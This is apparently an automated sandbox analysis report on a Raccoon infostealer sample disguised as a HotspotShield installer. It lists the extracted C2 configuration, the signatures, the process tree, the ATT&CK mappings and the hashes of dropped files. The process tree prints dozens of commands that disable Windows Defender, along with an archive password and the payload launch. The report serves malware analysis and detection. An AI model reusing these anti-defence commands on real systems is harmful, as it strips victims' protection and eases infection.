Analysis

  • max time kernel
    152s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    19-04-2022 02:44

General

  • Target

    1473faa523f68f98a636592c0a04dcdf5d597ad86824ed52ffdc439da07a00f2.exe

  • Size

    27.3MB

  • MD5

    d971f4f3784359c6e7dfc46f4dae1262

  • SHA1

    b07b2952de25d8cf3ff60ac140f85855890a2b83

  • SHA256

    1473faa523f68f98a636592c0a04dcdf5d597ad86824ed52ffdc439da07a00f2

  • SHA512

    047da592abd06221405815c1bb912fc894efaa36539d932559b0f25b4520236d29232b960161e4d6d1c424d15aaaf936dbc689df63a6148bf48039563b64bb6f

Malware Config

Extracted

Family

raccoon

Version

1.7.1-hotfix

Botnet

0422feff6c251ddfdca83125d9b8ae570db3b316

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 4 IoCs
  • Executes dropped EXE 8 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 13 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1473faa523f68f98a636592c0a04dcdf5d597ad86824ed52ffdc439da07a00f2.exe
    "C:\Users\Admin\AppData\Local\Temp\1473faa523f68f98a636592c0a04dcdf5d597ad86824ed52ffdc439da07a00f2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3376
    • C:\Users\Admin\AppData\Local\Temp\is-EGQGN.tmp\1473faa523f68f98a636592c0a04dcdf5d597ad86824ed52ffdc439da07a00f2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-EGQGN.tmp\1473faa523f68f98a636592c0a04dcdf5d597ad86824ed52ffdc439da07a00f2.tmp" /SL5="$9004C,27911687,749568,C:\Users\Admin\AppData\Local\Temp\1473faa523f68f98a636592c0a04dcdf5d597ad86824ed52ffdc439da07a00f2.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\51nkft\MMF.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\51nkft\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4156
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:428
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:2292
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                5⤵
                  PID:4852
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                    PID:4980
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:4808
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:1028
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:5044
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:3444
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:4616
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1192
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:2344
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:1996
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:1664
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:4204
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:4180
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:4840
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:3644
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                                PID:1700
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                5⤵
                                                  PID:4172
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  5⤵
                                                    PID:4160
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                    5⤵
                                                      PID:4944
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                      5⤵
                                                        PID:2992
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                        5⤵
                                                          PID:4692
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                          5⤵
                                                            PID:4704
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                            5⤵
                                                              PID:4972
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                              5⤵
                                                                PID:2720
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                5⤵
                                                                  PID:2592
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                  5⤵
                                                                    PID:2000
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    5⤵
                                                                      PID:1844
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      5⤵
                                                                        PID:1784
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                        • Modifies security service
                                                                        PID:420
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                          PID:2600
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\51nkft\main.bat" "
                                                                        4⤵
                                                                          PID:848
                                                                          • C:\Windows\SysWOW64\mode.com
                                                                            mode 65,10
                                                                            5⤵
                                                                              PID:1936
                                                                            • C:\ProgramData\51nkft\7z.exe
                                                                              7z.exe e file.zip -p___________24167pwd79pwd22684___________ -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1304
                                                                            • C:\ProgramData\51nkft\7z.exe
                                                                              7z.exe e extracted/file_3.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5112
                                                                            • C:\ProgramData\51nkft\7z.exe
                                                                              7z.exe e extracted/file_2.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:1560
                                                                            • C:\ProgramData\51nkft\7z.exe
                                                                              7z.exe e extracted/file_1.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:3032
                                                                            • C:\ProgramData\51nkft\nmhost.exe
                                                                              "nmhost.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4560
                                                                              • C:\ProgramData\51nkft\nmhost.exe
                                                                                "nmhost.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:2348
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\ProgramData\51nkft\DiskRemoval.bat" "
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:60
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /T 60 /NOBREAK
                                                                              5⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:3268
                                                                        • C:\Program Files (x86)\HotspotShield-8.7.1-plain-773-PreActive.exe
                                                                          "C:\Program Files (x86)\HotspotShield-8.7.1-plain-773-PreActive.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Enumerates connected drives
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4324
                                                                    • C:\Windows\system32\msiexec.exe
                                                                      C:\Windows\system32\msiexec.exe /V
                                                                      1⤵
                                                                      • Enumerates connected drives
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1200
                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding E1EC96E1EB492337EB07698161216204 C
                                                                        2⤵
                                                                        • Loads dropped DLL
                                                                        PID:880

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Persistence

                                                                    Modify Existing Service

                                                                    2
                                                                    T1031

                                                                    Defense Evasion

                                                                    Modify Registry

                                                                    2
                                                                    T1112

                                                                    Disabling Security Tools

                                                                    1
                                                                    T1089

                                                                    Discovery

                                                                    Query Registry

                                                                    2
                                                                    T1012

                                                                    System Information Discovery

                                                                    3
                                                                    T1082

                                                                    Peripheral Device Discovery

                                                                    1
                                                                    T1120

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Program Files (x86)\HotspotShield-8.7.1-plain-773-PreActive.exe
                                                                      Filesize

                                                                      23.0MB

                                                                      MD5

                                                                      dbfc5d301653c9e66f2aa7264d59d9a3

                                                                      SHA1

                                                                      b757b8a00655745df274cfa8cd80f3351853af76

                                                                      SHA256

                                                                      a7f4583ebae1e2c08f755ee266948af7b49ed27533f2852f8ec00a5e53ce825a

                                                                      SHA512

                                                                      8ce70acb62e7b33b00fb50a697a0fd884b50380e670f2a9cb91c7ede10fa48ec9b9ed7ca8f562c87b50fcc358bc717731fe648913f32ff7db908bbb8b3e6f039

                                                                    • C:\Program Files (x86)\HotspotShield-8.7.1-plain-773-PreActive.exe
                                                                      Filesize

                                                                      23.0MB

                                                                      MD5

                                                                      dbfc5d301653c9e66f2aa7264d59d9a3

                                                                      SHA1

                                                                      b757b8a00655745df274cfa8cd80f3351853af76

                                                                      SHA256

                                                                      a7f4583ebae1e2c08f755ee266948af7b49ed27533f2852f8ec00a5e53ce825a

                                                                      SHA512

                                                                      8ce70acb62e7b33b00fb50a697a0fd884b50380e670f2a9cb91c7ede10fa48ec9b9ed7ca8f562c87b50fcc358bc717731fe648913f32ff7db908bbb8b3e6f039

                                                                    • C:\ProgramData\51nkft\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • C:\ProgramData\51nkft\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • C:\ProgramData\51nkft\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • C:\ProgramData\51nkft\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • C:\ProgramData\51nkft\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • C:\ProgramData\51nkft\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\51nkft\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\51nkft\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\51nkft\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\51nkft\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\51nkft\DisableOAVProtection.bat
                                                                      Filesize

                                                                      33KB

                                                                      MD5

                                                                      c97c64f53865b9da2a642d36b02df043

                                                                      SHA1

                                                                      181ca1deb68409feae2e70ebf347b3111218a47a

                                                                      SHA256

                                                                      1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                      SHA512

                                                                      05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                    • C:\ProgramData\51nkft\DiskRemoval.bat
                                                                      Filesize

                                                                      211B

                                                                      MD5

                                                                      0f00552cee3a31dc4e8adc2738ca6d76

                                                                      SHA1

                                                                      85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                      SHA256

                                                                      1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                      SHA512

                                                                      137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                    • C:\ProgramData\51nkft\MMF.vbs
                                                                      Filesize

                                                                      20KB

                                                                      MD5

                                                                      fa6dcfa398aff28ba12687272732eb51

                                                                      SHA1

                                                                      f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                      SHA256

                                                                      f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                      SHA512

                                                                      9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                    • C:\ProgramData\51nkft\extracted\ANTIAV~1.DAT
                                                                      Filesize

                                                                      2.0MB

                                                                      MD5

                                                                      e177d8a197054920edc50c867c4d83c7

                                                                      SHA1

                                                                      93a9a13cb0e431d5d16c8d4656a71fe799e293b6

                                                                      SHA256

                                                                      91660c99fa87b69b7580ce7ce912120972e035f6ec058d9c1459f4f57098dfaf

                                                                      SHA512

                                                                      a39d0ee3e5f54366992dad2287bb2987b3d5aa4cb9b89354f43b36dcd57d466391e9927893803456a2b9fa19841eb0162dd2b4d97adba03ffe2005f1d51bd3a0

                                                                    • C:\ProgramData\51nkft\extracted\file_1.zip
                                                                      Filesize

                                                                      711KB

                                                                      MD5

                                                                      68c03d9f4ec112a706451e52ab0d0b6f

                                                                      SHA1

                                                                      70e4273937d277b2eb31cc355dafb614e7d92f0f

                                                                      SHA256

                                                                      2187fcb6ee171a80c7095fc4ce893ca4f543821a5dfed8e3ee4c16b5846cf5c2

                                                                      SHA512

                                                                      450255afb9105294a952bf53cb2ac6fdacfd000d10596b64e464566c3bdd23af127767ab4117b67195f4e6eed3e7b7470cd5254a2bc8e2c20f2a68dcfaf3cde0

                                                                    • C:\ProgramData\51nkft\extracted\file_2.zip
                                                                      Filesize

                                                                      711KB

                                                                      MD5

                                                                      465948131d48f0baa17e0bf956d05809

                                                                      SHA1

                                                                      76c9154637e706f48201c1f2714541d992c5566e

                                                                      SHA256

                                                                      79454b0e77c513282954fe6aaf30f1a7091ecb82044c5fc6c499fd8bc60fb1ce

                                                                      SHA512

                                                                      dc42c9261855682cdfbb5a6bf07d689f6485564fa31b66cdf4930ea10e4b06a92cb6b7d06989b57766a9032e2e5a3a685cf41b9b30faeb4947f4b676b26ff1c9

                                                                    • C:\ProgramData\51nkft\extracted\file_3.zip
                                                                      Filesize

                                                                      2.2MB

                                                                      MD5

                                                                      fd0491fdaf5981fb3a2838a05d0eebcf

                                                                      SHA1

                                                                      327109c15b1edfa7b414becefed917d5da249365

                                                                      SHA256

                                                                      a9b1c8af8081cd01593c16558871f9e9c6ee7b5ee7642a83091ffec7bc605fc8

                                                                      SHA512

                                                                      415cff0b902334733d392809f1b7d45df237eee94d962764a07ddd551af4847ee8fde3fa37aeccca37dcfee6afc786643fc167915bc3d505ae335b098106a639

                                                                    • C:\ProgramData\51nkft\extracted\nmhost.exe
                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      afb2c0a5886354403bcdabb3c3f04e67

                                                                      SHA1

                                                                      8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                      SHA256

                                                                      b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                      SHA512

                                                                      6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                    • C:\ProgramData\51nkft\file.bin
                                                                      Filesize

                                                                      2.2MB

                                                                      MD5

                                                                      790b451c8430b0c527f9ede30cce5f29

                                                                      SHA1

                                                                      5de6843d48641c14023c7f07f631f2a364697ae3

                                                                      SHA256

                                                                      777753312bb53895bb19c12c968ad5948fd4adcc534dee97d32b570fd6b827a7

                                                                      SHA512

                                                                      168ab36305b68e145ff7623ea611dba3ac3e1d6354ae9b3b8f621a179d75c07bda2237057320b440bf6a553dc48ee3a23fb4cad44dc52dc0cb62b455d2a0aafd

                                                                    • C:\ProgramData\51nkft\main.bat
                                                                      Filesize

                                                                      397B

                                                                      MD5

                                                                      7bcce13698737af294fffe1859c19b80

                                                                      SHA1

                                                                      33cd5b5e0c5dc1f515f93928fa6a0b0e81f591cc

                                                                      SHA256

                                                                      d5fa298b9210682b6d0d181ba1db301aa3f7eec2c69d5728cdd5c979d905e16c

                                                                      SHA512

                                                                      c491517707fa34593c4e0b66228eab2866d2c36f59377b2f2328e3dd88653e5cd64bdd6d07bf8fc8481fee02f34cd01c1d836aebacf6ffb89ea67f3ff4aa8d18

                                                                    • C:\ProgramData\51nkft\nmhost.exe
                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      afb2c0a5886354403bcdabb3c3f04e67

                                                                      SHA1

                                                                      8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                      SHA256

                                                                      b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                      SHA512

                                                                      6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                    • C:\ProgramData\51nkft\nmhost.exe
                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      afb2c0a5886354403bcdabb3c3f04e67

                                                                      SHA1

                                                                      8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                      SHA256

                                                                      b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                      SHA512

                                                                      6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                    • C:\Users\Admin\AppData\Local\Temp\MSIEE2E.tmp
                                                                      Filesize

                                                                      379KB

                                                                      MD5

                                                                      647145b1074e24a0c2bf8998917a8a90

                                                                      SHA1

                                                                      0c863b05a5599b2c1dd0645e086cda4a9f2fb954

                                                                      SHA256

                                                                      91933aae899e769f6aa29a3640bf8151e70192aa5d416195b9c69041301101e1

                                                                      SHA512

                                                                      f991cda750d4b57c847076f16bf267f1aee503cdacac3732fe0ea1ac685a6424722be61e184fe9c0006c0008387c723ea5ef5ca3a1e638dd47aa609549e8d3a3

                                                                    • C:\Users\Admin\AppData\Local\Temp\MSIEE2E.tmp
                                                                      Filesize

                                                                      379KB

                                                                      MD5

                                                                      647145b1074e24a0c2bf8998917a8a90

                                                                      SHA1

                                                                      0c863b05a5599b2c1dd0645e086cda4a9f2fb954

                                                                      SHA256

                                                                      91933aae899e769f6aa29a3640bf8151e70192aa5d416195b9c69041301101e1

                                                                      SHA512

                                                                      f991cda750d4b57c847076f16bf267f1aee503cdacac3732fe0ea1ac685a6424722be61e184fe9c0006c0008387c723ea5ef5ca3a1e638dd47aa609549e8d3a3

                                                                    • C:\Users\Admin\AppData\Local\Temp\MSIEF87.tmp
                                                                      Filesize

                                                                      379KB

                                                                      MD5

                                                                      647145b1074e24a0c2bf8998917a8a90

                                                                      SHA1

                                                                      0c863b05a5599b2c1dd0645e086cda4a9f2fb954

                                                                      SHA256

                                                                      91933aae899e769f6aa29a3640bf8151e70192aa5d416195b9c69041301101e1

                                                                      SHA512

                                                                      f991cda750d4b57c847076f16bf267f1aee503cdacac3732fe0ea1ac685a6424722be61e184fe9c0006c0008387c723ea5ef5ca3a1e638dd47aa609549e8d3a3

                                                                    • C:\Users\Admin\AppData\Local\Temp\MSIEF87.tmp
                                                                      Filesize

                                                                      379KB

                                                                      MD5

                                                                      647145b1074e24a0c2bf8998917a8a90

                                                                      SHA1

                                                                      0c863b05a5599b2c1dd0645e086cda4a9f2fb954

                                                                      SHA256

                                                                      91933aae899e769f6aa29a3640bf8151e70192aa5d416195b9c69041301101e1

                                                                      SHA512

                                                                      f991cda750d4b57c847076f16bf267f1aee503cdacac3732fe0ea1ac685a6424722be61e184fe9c0006c0008387c723ea5ef5ca3a1e638dd47aa609549e8d3a3

                                                                    • C:\Users\Admin\AppData\Local\Temp\MSIEFD6.tmp
                                                                      Filesize

                                                                      379KB

                                                                      MD5

                                                                      647145b1074e24a0c2bf8998917a8a90

                                                                      SHA1

                                                                      0c863b05a5599b2c1dd0645e086cda4a9f2fb954

                                                                      SHA256

                                                                      91933aae899e769f6aa29a3640bf8151e70192aa5d416195b9c69041301101e1

                                                                      SHA512

                                                                      f991cda750d4b57c847076f16bf267f1aee503cdacac3732fe0ea1ac685a6424722be61e184fe9c0006c0008387c723ea5ef5ca3a1e638dd47aa609549e8d3a3

                                                                    • C:\Users\Admin\AppData\Local\Temp\MSIEFD6.tmp
                                                                      Filesize

                                                                      379KB

                                                                      MD5

